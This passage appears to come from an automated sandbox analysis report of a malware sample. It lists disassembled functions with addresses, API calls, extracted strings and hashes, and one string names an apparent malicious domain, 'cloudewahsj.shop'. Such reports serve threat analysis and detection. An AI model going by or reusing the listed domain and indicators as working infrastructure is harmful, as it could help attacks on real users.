Instruction Fuzzy Hash: 5E02E3B46043808FD700DF29D89075ABBE1EBD6304F05897EEA859B3D1D379D909CB96

Function 02104527 Relevance: 6.7, Strings: 5, Instructions: 465COMMON

Download Yara Rule

Strings

IHDR, xrefs: 02104923
IEND, xrefs: 02104A06
IDAT, xrefs: 02104992
), xrefs: 021045A4
), xrefs: 021045AE

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: 6dda164276c19b2348408bf08e15d5684114f8bdc5157cb020ecd11399e8153b
Instruction ID: 6391aba60b0892944e33647bd1bb5333d539c0e8df9422f53ecd92106e008e91
Opcode Fuzzy Hash: 6dda164276c19b2348408bf08e15d5684114f8bdc5157cb020ecd11399e8153b
Instruction Fuzzy Hash: 890205B06483808FD714CF29D8D076ABBE1EF96304F06856DEA858B3D1D3B5D909CB92

Function 0210C2E7 Relevance: 6.4, Strings: 5, Instructions: 104COMMON

Download Yara Rule

Strings

DM_e, xrefs: 0210C2EA
FwPq, xrefs: 0210C320
Js, xrefs: 0210C328
50, xrefs: 0210C414
'!, xrefs: 0210C380

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: 50$DM_e$FwPq$Js$'!
API String ID: 0-1711485358
Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction ID: c93cc97c890ce6e314dde900dbe4b4db463fe81eb01bf1a893d898895732c06d
Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction Fuzzy Hash: 8D51DAB45493808FE334CF25C991B8BBBB1BBA1308F609A0CE6D95B254CB759446CF97

Function 00419B30 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 947COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419FF7
FreeLibrary.KERNEL32(?), ref: 0041A039

Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE

Strings

mj, xrefs: 00419F08

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: mj
API String ID: 764372645-1022201683
Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B

Function 00425713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743

Strings

67, xrefs: 00425B0C

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B

Function 00425DA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24

Strings

23, xrefs: 00425E1F

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 23
API String ID: 237503144-326707096
Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89

Function 00429917 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A

Function 00429B7B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A

Function 00437C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00437C52
GetSystemMetrics.USER32 ref: 00437C62

Strings

, xrefs: 00437D4F

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A

Function 00427FC0 Relevance: 5.4, Strings: 4, Instructions: 431COMMON

Download Yara Rule

Strings

vC, xrefs: 00428162
#C}, xrefs: 00428438
@-, xrefs: 0042814C
up, xrefs: 00428157

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: #C}$@-$up$vC
API String ID: 0-3794437364
Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A

Function 0041906A Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

u, xrefs: 004193AF
wq, xrefs: 00419150
67, xrefs: 00419200
J, xrefs: 004194C6

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 67$J$u$wq
API String ID: 0-4028943437
Opcode ID: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
Instruction ID: 45cabc22797d8237a69fda20461bdfe49cb428b8aed426b658ce7b40843b0e88
Opcode Fuzzy Hash: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
Instruction Fuzzy Hash: 2AB176B04483828BD7348F25C4A17EBBBE1EF92314F14892DD8D94B785E7794886CB87

Function 004437D0 Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85

Function 004438E0 Relevance: 4.3, Strings: 3, Instructions: 577COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 004438FB Relevance: 4.3, Strings: 3, Instructions: 566COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85

Function 004438F9 Relevance: 4.3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 00440B00 Relevance: 4.3, Strings: 3, Instructions: 555COMMON

Download Yara Rule

Strings

f, xrefs: 00440DAA
S"(w, xrefs: 00440BF0
S"(w, xrefs: 00440E4F

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$f
API String ID: 2994545307-891790955
Opcode ID: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
Instruction ID: 3cfac3c3f928c660201977811b78d3d3052ee887d4b0c26ff85acd92e20ac89e
Opcode Fuzzy Hash: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
Instruction Fuzzy Hash: B412E1756083508FE324CF19C880B2BBBE1BBC9314F148A6EE9D45B3A1D775AC45CB96

Function 00443A30 Relevance: 4.2, Strings: 3, Instructions: 488COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
Instruction ID: 631fa3f1d4c0726364ceec28ad2e892877ef6bcbce7aa5fcc49a4e7daf9cf800
Opcode Fuzzy Hash: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
Instruction Fuzzy Hash: DAE1FE39B09321CFD304DF29D89072AB7E2FB9A311F4A887DD589873A2D634D941CB85

Function 004239EB Relevance: 4.2, Strings: 3, Instructions: 458COMMON

Download Yara Rule

Strings

cloudewahsj.shop, xrefs: 00424034
yD, xrefs: 00423BFC
0335F29CCD96CC48822D1F4978021086, xrefs: 00423CE9

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 0335F29CCD96CC48822D1F4978021086$cloudewahsj.shop$yD
API String ID: 0-912595998
Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
Instruction ID: ea6ce95d3b2e4101921536522c50bf2979d69fc2778ed717b5a7399473229c95
Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
Instruction Fuzzy Hash: BF322951608BD28DD326CB7C8848355BF912B27228F1C87DDD1E94F3D3D2AA8587C7A6

Function 021225D7 Relevance: 4.2, Strings: 3, Instructions: 457COMMON

Download Yara Rule

Strings

anold~m`, xrefs: 02122741
-jkhanold~m`, xrefs: 02122735
d~m`, xrefs: 0212271C

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: -jkhanold~m`$anold~m`$d~m`
API String ID: 0-185452761
Opcode ID: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
Instruction ID: 24b2919656d1450ca82373c114238960c067d6f6440d26e991fdcf9bac1e60ef
Opcode Fuzzy Hash: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
Instruction Fuzzy Hash: A4D17BB06483908FD714DF68C891BABB7E0EF85718F14491CF9958B391E7B9D809CB52

Function 00443AC0 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
Instruction ID: ab5f315b9e91ee1687aa44fd25e1738b775e8891b6341d15c5394949b1c7dc9f
Opcode Fuzzy Hash: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
Instruction Fuzzy Hash: 53D1FF3AA08310CFD314DF29D89072AB7E2FBDA310F4A897DE58987392D674D941CB85

Function 00421180 Relevance: 4.2, Strings: 3, Instructions: 428COMMON

Download Yara Rule

Strings

8deZ, xrefs: 00421342
567, xrefs: 004216A5
<`>f, xrefs: 00421337

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 8deZ$<`>f$567
API String ID: 0-937435233
Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction ID: 754c1abd1b676f1653a7a5478e22f099d0a2726f3b1f9a9f143ecbe85e8fc021
Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction Fuzzy Hash: 99D1FFB06083208BD720DF24C851B6BB7F2FFE1354F498A6DE4858B3A5E3799845C756

Function 021213E7 Relevance: 4.2, Strings: 3, Instructions: 428COMMON

Download Yara Rule

Strings

8deZ, xrefs: 021215A9
<`>f, xrefs: 0212159E
567, xrefs: 0212190C

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: 8deZ$<`>f$567
API String ID: 0-937435233
Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction ID: 9a783b4bff6424605752b5147ba909c24ce1ba9e7b87c3ea487bc8dda840438b
Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction Fuzzy Hash: 01D1EFB15483508BD724DF24C891B6BB7F2EFC2318F098A6CE4C98B396E7759449CB52

Function 0042F716 Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

bC, xrefs: 0042FD1D
5, xrefs: 0042FC83
Tx+, xrefs: 0042FD77

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 5$Tx+$bC
API String ID: 0-2958649183
Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56

Function 0212F97D Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

5, xrefs: 0212FEEA
bC, xrefs: 0212FF84
Tx+, xrefs: 0212FFDE

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: 5$Tx+$bC
API String ID: 0-2958649183
Opcode ID: 878d8cd2ffcbb237619de5602d15ed4e3526d5757278a69bfb0ca6ece5a1916c
Instruction ID: 8ebb8a3bda3c2b2946275668c3e0f21a83e66bb326afce0bb267435aefc94491
Opcode Fuzzy Hash: 878d8cd2ffcbb237619de5602d15ed4e3526d5757278a69bfb0ca6ece5a1916c
Instruction Fuzzy Hash: A8B1C17050C3D18AE739CF2984607ABFFE1AF97304F18896DE1D987692D77A8405CB52

Function 00428750 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

&76#, xrefs: 00428A72
/X, xrefs: 00428A82
BDE:, xrefs: 004287C2, 004287F2

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: InitializeThunk
String ID: &76#$/X$BDE:
API String ID: 2994545307-3468712750
Opcode ID: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
Instruction ID: de511f14106650819994a34559177bbffe3ae858db635c904efe7b47fdd347f8
Opcode Fuzzy Hash: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
Instruction Fuzzy Hash: 4C9146B27093119BD3109F25EC8176FB6D2EBC5318F58813EE4858B381EA3C9846878B

Function 021289B7 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

&76#, xrefs: 02128CD9
/X, xrefs: 02128CE9
BDE:, xrefs: 02128A29, 02128A59

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID: &76#$/X$BDE:
API String ID: 0-3468712750
Opcode ID: 3e21cf73c2ae3528f4817cde07a7e232aa130a7225a0a67fc89e53a2e6491216
Instruction ID: bc1d7430ccfd0a50f802f2160f586ab2c0c760f68d655416d5404fa6d1afeafc
Opcode Fuzzy Hash: 3e21cf73c2ae3528f4817cde07a7e232aa130a7225a0a67fc89e53a2e6491216
Instruction Fuzzy Hash: 179137B26893204BD3149F25CC9176BB6D2EFC5314F1A853CF8858B390E775D81AC766

Function 0042FB7D Relevance: 4.1, Strings: 3, Instructions: 327COMMON

Download Yara Rule

Strings

bC, xrefs: 0042FD1D
5, xrefs: 0042FC83
Tx+, xrefs: 0042FD77

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: 5$Tx+$bC
API String ID: 0-2958649183
Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56

Function 0043099F Relevance: 4.0, Strings: 3, Instructions: 251COMMON

Download Yara Rule

Strings

.^Nw, xrefs: 00430C54
QRP,, xrefs: 00430C49
ut, xrefs: 00430B4D

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: ut$.^Nw$QRP,
API String ID: 0-2489489831
Opcode ID: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
Instruction ID: c8479f28a28c815cfbd9d5fc95f9476b123213feaa6e9ea5c0c948cebaf48d73
Opcode Fuzzy Hash: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
Instruction Fuzzy Hash: 3B710A7110D3918FD3258B2588B03E7BBD19FDB704F585A5DD0CA4B341DB794906CB56

Function 0040F2D0 Relevance: 3.9, Strings: 3, Instructions: 168COMMON

Download Yara Rule

Strings

:, xrefs: 0040F2F5
, xrefs: 0040F44B
K, xrefs: 0040F38E

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID: $:$K
API String ID: 0-296352136
Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
Instruction ID: e3fd2fc2a8267f717fe0e7e766dd9ea259cde5192962e3fe240e8cbdfa04c585
Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
Instruction Fuzzy Hash: 3A51A27250C7908AD7209B3884543AFBBD0AB96334F190F7EE8EAE73C1E67885458757

